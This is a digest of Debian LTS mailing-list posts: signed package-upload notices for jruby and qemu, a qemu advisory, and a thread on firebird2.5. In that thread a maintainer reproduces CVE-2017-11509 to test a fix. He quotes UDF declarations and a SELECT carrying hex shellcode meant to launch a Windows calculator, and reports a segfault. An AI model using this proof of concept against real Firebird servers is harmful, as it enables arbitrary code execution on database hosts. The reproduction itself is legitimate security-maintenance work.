Accepted jruby 1.5.6-5+deb7u2 (source all) into oldoldstable

[Markus Koschany]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Format: 1.8
Date: Tue, 17 Apr 2018 22:32:31 +0200
Source: jruby
Binary: jruby
Architecture: source all
Version: 1.5.6-5+deb7u2
Distribution: wheezy-security
Urgency: high
Maintainer: Debian Java Maintainers 

Changed-By: Markus Koschany 
Description: 
 jruby  - 100% pure-Java implementation of Ruby
Changes: 
 jruby (1.5.6-5+deb7u2) wheezy-security; urgency=high
 .
   * Non-maintainer upload by the LTS team.
   * Fix CVE-2018-174: possible Unsafe Object Deserialization Vulnerability
 in gem owner.
   * Build with OpenJDK 6 to avoid a FTBFS with Java 7.
Checksums-Sha1: 
 46f2a404de67094efbabde7a836a8e3a395870bf 2466 jruby_1.5.6-5+deb7u2.dsc
 54e19e1354357ff79b8e9e03c5d461981a5ae03c 30344 
jruby_1.5.6-5+deb7u2.debian.tar.xz
 c9f31c0fab1a2b23b2237e8821d60aa9c6e3b112 8918996 jruby_1.5.6-5+deb7u2_all.deb
Checksums-Sha256: 
 5c291e934d2af8d4175e9c226064f3596bbff41de199cad5b78f6c4a0d33cb93 2466 
jruby_1.5.6-5+deb7u2.dsc
 acd0e580f23eae1bd0e466a018bfc0730cca14b6866e0112aeaf279365837985 30344 
jruby_1.5.6-5+deb7u2.debian.tar.xz
 5e1da14cf18ba241c1c4e0e92a0b2c1075932d717e21a647cfcd79337e042110 8918996 
jruby_1.5.6-5+deb7u2_all.deb
Files: 
 eac60b647c44f712953ce57575cafda9 2466 ruby optional jruby_1.5.6-5+deb7u2.dsc
 55c86f3dfb2330f4ab85eec1c0802bdc 30344 ruby optional 
jruby_1.5.6-5+deb7u2.debian.tar.xz
 2731873078d5e5f18279d8e355ee473a 8918996 ruby optional 
jruby_1.5.6-5+deb7u2_all.deb

-BEGIN PGP SIGNATURE-

iQKjBAEBCgCNFiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAlrWaW9fFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQPHGFwb0BkZWJp
YW4ub3JnAAoJENmtFLlRO1HkgrUP/3Xljp7fNxLuAJ5W9roI+YbGw6ykQKr4Gbq1
WpJeW4s5zL3n2HdcatZxWuP8geyzx6INcKCnm6PCHw3YbMh7bPSecEA8b2uNtr4G
YSrU6Dec3QNwF79+G6PS4WOjfq3CNGrI6TfNl7C2jtdqCMoMHAETOlfV0naFdgS/
uA4TKExK4o9+07rnRg/dU0/c6nyahU0gIQsKrXtheJ+SxVPYItmwaBRfbh+GP7t2
tZqUF6AR2wJ3ilaG5nBS0TSJdOqwCG3qK7kh3XXqTuNJLEmjt+HpDljVSPcN5ezc
a5KcWJ6UB+B/Uce2PnS+qymvDIpIGy+w6HaMQDUhrraPrpt2yiTXoLaeh2kafvmQ
gL6Cc6IhYoo6peNI9w/h8AIknokOldw+Lzbek0J6y73AKb8frh0HvZCZCIEZyiiq
9O6Cn1pkBHdPLfok1PAWmzLpx+98H1jOjgQGnIy4+aIgYJnCdqW33gb40hxxVuRV
xsybevUxzmH7ViCQ4SLPNK5mESqOPyBKJFw3vXSF7zOnO+pqcPywXoL8Tx810N+D
TzSXt6vXo85rnTg4ahkjpohB7oUTfpAXLGhDbqb0ZiYrujnhIzg1Ugp9PgLoPspD
59rwK0E8Q7OoVMpoea0b57+Gx8nCP3KwlytL2DPruc7rRBZhkwsjkKCOG5dLUh02
njs/0rd+
=/5gp
-END PGP SIGNATURE-

Re: Wheezy update of firebird2.5?

[Damyan Ivanov]

-=| Antoine Beaupré, 17.04.2018 12:59:26 -0400 |=-
> I don't quite know where to go from here. I was somewhat hoping that
> Wheezy would be magically not vulnerable to this issue, but obviously,
> there's something wrong here that should probably be fixed.

The only fix upstream has is to disable UDFs in firebird.conf -- 
https://salsa.debian.org/firebird-team/firebird3.0/blob/master/debian/patches/deb/cve-2017-11509.patch
 
(probebly needs adaptation for firebird2.5, but you get the idea).


-- dam

Re: Wheezy update of firebird2.5?

[Antoine Beaupré]

On 2018-04-04 19:54:14, Damyan Ivanov wrote:
> -=| Chris Lamb, 04.04.2018 08:39:52 +0100 |=-
>> Dear maintainer(s),
>> 
>> The Debian LTS team would like to fix the security issues which are
>> currently open in the Wheezy version of firebird2.5:
>> https://security-tracker.debian.org/tracker/source-package/firebird2.5
>> 
>> Would you like to take care of this yourself?
>
> Sorry, no.
>
> AFAIS, the only open vulnerability is CVE-2017-11509. Moritz from the 
> security team advised against updating that for stable, and the issue 
> is still open in unstable.
>
> According to the researchers discovering it, upstream refused to fix 
> it :( so the only "fix" I am aware of is the change in the default 
> config to disable the vulnerable functionality. You can find the patch 
> for firebird3.0 at 
> https://salsa.debian.org/firebird-team/firebird3.0/commit/5ad1c64f67ce9f091a2b747fa54519ef7d144698
>
> It is perhaps not directly applicable to firebid2.5, but should help 
> regardless.

I tried digging into this issue a little further, and couldn't get
far. I always have this hurdle to just setup a test environment with
Firebird, so I figured I would share the procedure here for the future,
so that I wouldn't have to rebuild this from scratch every time.

 1. install the database and packages:

apt-get install firebird2.5-examples firebird2.5-dev 
firebird2.5-superclassic

 2. set a admin password and configure the server:

dpkg-reconfigure firebird2.5-superclassic

 3. deploy a test database:

gunzip -c 
/usr/share/doc/firebird2.5-examples/examples/empbuild/employee.fdb.gz > 
/var/lib/firebird/2.5/data/employee.fdb
chown firebird.firebird /var/lib/firebird/2.5/data/employee.fdb

 4. connect to the database, in a `isql-fb` prompt:

SQL> connect "localhost:/var/lib/firebird/2.5/data/employee.fdb" user 
'SYSDBA' password 'password';

Then you can do stuff like `SHOW TABLES` and so on. In particular, I
have tried to reproduce the issue and I can confirm I can create two
external functions with the same ENTRY_POINT, although the second
snippet in the advisory has two `DECLARE` statements which I assume is a
typo:

DECLARE EXTERNAL FUNCTION string2blob
   VARCHAR(300) BY DESCRIPTOR,
   BLOB RETURNS PARAMETER 2
   ENTRY_POINT 'string2blob' MODULE_NAME 'fbudf'

DECLARE EXTERNAL FUNCTION a6
  VARCHAR(300) BY DESCRIPTOR,
  VARCHAR(400) BY DESCRIPTOR
  RETURNS INTEGER
  ENTRY_POINT 'string2blob' MODULE_NAME 'fbudf'

The actual query to trigger arbitrary code execution seems to fail,
however:

SQL> select a6((select 
x'31db648b7b308b7f0c8b7f1c8b47088b77208b3f807e0c3375f289c703783c8b577801c28b7a2001c789dd8b34af01c645813e4372656175f2817e086f63657375e98b7a2401c7668b2c6f8b7a1c01c78b7caffc01c789d9b1ff53e2fd6863616c6389e252525353535353535253ffd7'
 from rdb$database), (select x'C8FD8503' from rdb$database)) from 
rdb$databaseStatement failed, SQLSTATE = 08006
Unable to complete network request to host "localhost".
-Error writing data to the connection.

Considering it was crafted to start `CALC.EXE` in Windows, that might be
expected. We do see a segfault in the logs however:

wheezy  Tue Apr 17 16:49:56 2018
The user defined function:  A6
   referencing entrypoint:  string2blob
in module:  fbudf
caused the fatal exception: Segmentation Fault.
The code attempted to access memory
without privilege to do so.
This exception will cause the Firebird server
to terminate abnormally.

... which is probably a bad sign.

I don't quite know where to go from here. I was somewhat hoping that
Wheezy would be magically not vulnerable to this issue, but obviously,
there's something wrong here that should probably be fixed.

A.

-- 
Every time I see an adult on a bicycle I no longer despair for the
future of the human race.
 - H. G. Wells

Re: ruby1.9.1 test packages for wheezy

[Antoine Beaupré]

Also, after talking with my old colleagues, I just realized that they
might be using Ruby 1.8 and not 1.9.1. It seems we have triaged those
out of the picture, but maybe all 1.8 packages are affected by a bunch
of those issues too? This looks suspiciously sparse:

https://security-tracker.debian.org/tracker/source-package/ruby1.8

... when compared to the larger:

https://security-tracker.debian.org/tracker/source-package/ruby1.9.1

I feel it's quite possible we have forgotten a bunch of CVEs in Ruby
1.8, is it possible?

A.

[SECURITY] [DLA 1351-1] qemu security update

[Antoine Beaupré]

Package: qemu
Version: 1.1.2+dfsg-6+deb7u25
CVE ID : CVE-2018-7550
Debian Bug : 892041

The load_multiboot function in hw/i386/multiboot.c in Quick Emulator
(aka QEMU) allows local guest OS users to execute arbitrary code on
the QEMU host via a mh_load_end_addr value greater than
mh_bss_end_addr, which triggers an out-of-bounds read or write memory
access.

For Debian 7 "Wheezy", these problems have been fixed in version
1.1.2+dfsg-6+deb7u25.

We recommend that you upgrade your qemu packages.

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS


signature.asc
Description: PGP signature

Accepted qemu 1.1.2+dfsg-6+deb7u25 (source all amd64) into oldoldstable

[Antoine Beaupré]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Format: 1.8
Date: Tue, 17 Apr 2018 09:30:00 -0400
Source: qemu
Binary: qemu qemu-keymaps qemu-system qemu-user qemu-user-static qemu-utils
Architecture: source all amd64
Version: 1.1.2+dfsg-6+deb7u25
Distribution: wheezy-security
Urgency: medium
Maintainer: Debian QEMU Team 
Changed-By: Antoine Beaupré 
Description:
 qemu   - fast processor emulator
 qemu-keymaps - QEMU keyboard maps
 qemu-system - QEMU full system emulation binaries
 qemu-user  - QEMU user mode emulation binaries
 qemu-user-static - QEMU user mode emulation binaries (static version)
 qemu-utils - QEMU utilities
Closes: 892041
Changes:
 qemu (1.1.2+dfsg-6+deb7u25) wheezy-security; urgency=medium
 .
   * Non-maintainer upload by the LTS Security Team.
   * CVE-2018-7550: fix host arbitrary code execution in mutliboot
 (Closes: #892041)
Checksums-Sha1:
 1dd053d9687e5e6d9778fbee132f5428c12d0677 2634 qemu_1.1.2+dfsg-6+deb7u25.dsc
 92d1136d288087dfd8f3da4398c088831ffa14c5 198734 
qemu_1.1.2+dfsg-6+deb7u25.debian.tar.gz
 0d3cb29325b4300bde8ad354984502021d5965ac 53066 
qemu-keymaps_1.1.2+dfsg-6+deb7u25_all.deb
 2c7cc0256a48b5f419492e089a7a92cd4ebe40aa 121236 
qemu_1.1.2+dfsg-6+deb7u25_amd64.deb
 42d972e761fbe02c900cf6203afc77d3a2ef6c16 27982434 
qemu-system_1.1.2+dfsg-6+deb7u25_amd64.deb
 9aabb1cead411f72ba5b05b622f0108319bc11aa 7722094 
qemu-user_1.1.2+dfsg-6+deb7u25_amd64.deb
 140091e78dc88f3dc4a757e3b1fe3738602537cf 16575624 
qemu-user-static_1.1.2+dfsg-6+deb7u25_amd64.deb
 994765f6d55b2ca3dfef6a9c4aae4ec4c033302b 666592 
qemu-utils_1.1.2+dfsg-6+deb7u25_amd64.deb
Checksums-Sha256:
 b11b71d7b60c0d1a891888b4e4cd5288be2dd95130f840b118356d967d307a86 2634 
qemu_1.1.2+dfsg-6+deb7u25.dsc
 78e380305dc14928e82e2793a1de8ecca79599fb32b08e7e5f33c176d99efd8f 198734 
qemu_1.1.2+dfsg-6+deb7u25.debian.tar.gz
 a485e4688ad524ce7237e76e389114ef5029c9d36537cd894b7230cdc42ea1fb 53066 
qemu-keymaps_1.1.2+dfsg-6+deb7u25_all.deb
 47447169367d77ba07189056d0ed4c88646b2624ad2f16bdff87d7936b52d1a4 121236 
qemu_1.1.2+dfsg-6+deb7u25_amd64.deb
 ae150fa11452300e560983cf0606ce29ccaa3ffe1be0f7cfdae35dc22d4eb6f8 27982434 
qemu-system_1.1.2+dfsg-6+deb7u25_amd64.deb
 4139f08ad386014a4cc082f40a87eb0bfdb47afa0305fb9618ca5f7df7c6b7cf 7722094 
qemu-user_1.1.2+dfsg-6+deb7u25_amd64.deb
 61f30137fdfc91879cf8ba277b6ddcf3400e601f21adc917296fd049f24aaf9c 16575624 
qemu-user-static_1.1.2+dfsg-6+deb7u25_amd64.deb
 edb3ff74a1bbd654b95e6bdcd6bb7b793726ee5d57a8a6ffac0e8d930fb6d0bc 666592 
qemu-utils_1.1.2+dfsg-6+deb7u25_amd64.deb
Files:
 fc202d43c25d565e2c45c9720ec27da5 2634 misc optional 
qemu_1.1.2+dfsg-6+deb7u25.dsc
 afe0019a0ef24195b57095ba8e90d368 198734 misc optional 
qemu_1.1.2+dfsg-6+deb7u25.debian.tar.gz
 716be78a8374f141d975e4fac5ccfc28 53066 misc optional 
qemu-keymaps_1.1.2+dfsg-6+deb7u25_all.deb
 62cf25f656cba0d1d6a53ec349693d45 121236 misc optional 
qemu_1.1.2+dfsg-6+deb7u25_amd64.deb
 330623ab1094b33be84cef40f9a547ce 27982434 misc optional 
qemu-system_1.1.2+dfsg-6+deb7u25_amd64.deb
 47ca1eabc268a4adae2e78b1a501e318 7722094 misc optional 
qemu-user_1.1.2+dfsg-6+deb7u25_amd64.deb
 db1c76e4e792ae89f63776bd0f26395a 16575624 misc optional 
qemu-user-static_1.1.2+dfsg-6+deb7u25_amd64.deb
 d9669f780fd33ede9db839139c54155c 666592 misc optional 
qemu-utils_1.1.2+dfsg-6+deb7u25_amd64.deb

-BEGIN PGP SIGNATURE-

iQEzBAEBCAAdFiEEexZCBNCWcjsBljWrPqHd3bJh2XsFAlrWAZMACgkQPqHd3bJh
2XusDAf/XA5SkJgvCn+y+PhAzf+cxbMX3UVmRcyqMZMWo4OzVJsFM9F/8E9Onm+5
wk1dliJ7NTavayv0QW3uWfDuHAfqD3HDKOvzl36lHykHYI7RzND+dbZ+Ka2KLKJt
WbPjIHALWEElCgaPz6tlduFQOWyYOjOp2owS9K9Elxcj5yMwNGyiRWWYvbLCUNH1
qUkbma+9HA8cVIsdM1S+G3lx0HRMBZjFuAJikaE9qC/WyFiEeqiu4MzH21TF9D+B
4sjpok1Bnvb/auYMq4nsV7XhtnuhuDpBfvqFETaQGxFlYZZ5qNF8WVrws2q8KEif
5tVlhWePYnpQ2Z2ys7lM1rnS3n+Pew==
=106+
-END PGP SIGNATURE-

Accepted qemu-kvm 1.1.2+dfsg-6+deb7u25 (source amd64) into oldoldstable

[Antoine Beaupré]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Format: 1.8
Date: Thu, 12 Apr 2018 13:12:27 -0400
Source: qemu-kvm
Binary: qemu-kvm qemu-kvm-dbg kvm
Architecture: source amd64
Version: 1.1.2+dfsg-6+deb7u25
Distribution: wheezy-security
Urgency: medium
Maintainer: Michael Tokarev 
Changed-By: Antoine Beaupré 
Description:
 kvm- dummy transitional package from kvm to qemu-kvm
 qemu-kvm   - Full virtualization on x86 hardware
 qemu-kvm-dbg - Debugging info for qemu-kvm
Closes: 892041
Changes:
 qemu-kvm (1.1.2+dfsg-6+deb7u25) wheezy-security; urgency=medium
 .
   * Non-maintainer upload by the LTS Security Team.
   * CVE-2018-7550: fix host arbitrary code execution in mutliboot
 (Closes: #892041)
Checksums-Sha1:
 f8a02baa0a475af37fd16975d9d4e76e37d936be 2158 qemu-kvm_1.1.2+dfsg-6+deb7u25.dsc
 6e5d6bbcec43755e9b39628f2f21a8c014edc9fb 186394 
qemu-kvm_1.1.2+dfsg-6+deb7u25.debian.tar.gz
 6baa3b4cf33f03ffee73f2e54f4eec0f65588c8a 1698234 
qemu-kvm_1.1.2+dfsg-6+deb7u25_amd64.deb
 85ed2a6f14c4eab87c872678b768fc83da6a4099 5335138 
qemu-kvm-dbg_1.1.2+dfsg-6+deb7u25_amd64.deb
 987f9de0963a163d96c9bf74955e18ad70e74d58 26930 
kvm_1.1.2+dfsg-6+deb7u25_amd64.deb
Checksums-Sha256:
 acbb264cadf8623f487f45b88ecc8537c8612bce6bb1fcaedfb84f54c753cdc9 2158 
qemu-kvm_1.1.2+dfsg-6+deb7u25.dsc
 7754b9545b7e9ea46ea803034b97f0d211905825c90716f9e9198c9c79b52b88 186394 
qemu-kvm_1.1.2+dfsg-6+deb7u25.debian.tar.gz
 a694279162b09df62c907ee74d07b435638babeb7c1b4bb2894bcd38a036045e 1698234 
qemu-kvm_1.1.2+dfsg-6+deb7u25_amd64.deb
 15c34aebc26dc9dfadec5448f26468c92a607150f2ceb1b22545b8fb69a91cda 5335138 
qemu-kvm-dbg_1.1.2+dfsg-6+deb7u25_amd64.deb
 5cfb9a852e4e978c8ddfe37a251c40c0336fe5edb89a9ed85ad4524800604f56 26930 
kvm_1.1.2+dfsg-6+deb7u25_amd64.deb
Files:
 9df09a787bd0fd9f6ee347dd67d0da7f 2158 misc optional 
qemu-kvm_1.1.2+dfsg-6+deb7u25.dsc
 6f31648b34940c0cc60a576bcffac0f1 186394 misc optional 
qemu-kvm_1.1.2+dfsg-6+deb7u25.debian.tar.gz
 0594765afd3795389a7de36e40e7e37c 1698234 misc optional 
qemu-kvm_1.1.2+dfsg-6+deb7u25_amd64.deb
 608828bcc626c023ac56c61216630f20 5335138 debug extra 
qemu-kvm-dbg_1.1.2+dfsg-6+deb7u25_amd64.deb
 5f8f27eadfbb53f5dec79a1a533709fc 26930 oldlibs extra 
kvm_1.1.2+dfsg-6+deb7u25_amd64.deb

-BEGIN PGP SIGNATURE-

iQEzBAEBCAAdFiEEexZCBNCWcjsBljWrPqHd3bJh2XsFAlrV+hUACgkQPqHd3bJh
2XvGAAf/SvZkzqJYiJvJqsSjgqtXIsICVAiyeSn59Y+adU+X/zPWp+7E0z9bEihC
Gdl2Z/SMbbz0lDFwg/Y6Eh2L87iE5GFouJ2D9S1t36M45UN8GDdiayyO7iGeVkA4
62aOO7q++YhIoMaPLSGevXfImF9uR6e78qY0TvqikH6nNb0mPrtu2ZGXyDUmi8ut
5OW6y+y4R1hq+8wVSlVwDlXLiVsyiN5JKQsp5EvQGY7j4Q7LmSGnsCYsSdmcwXTU
u9Gd1AX9As9LP4V6ryFj13Fm56BfCTVGS7d5fqkgthpqum/H+bufEXbfSC3CQTYb
9pUj+EUZc+FsF6BB1HcTuU068e0b1w==
=fBKK
-END PGP SIGNATURE-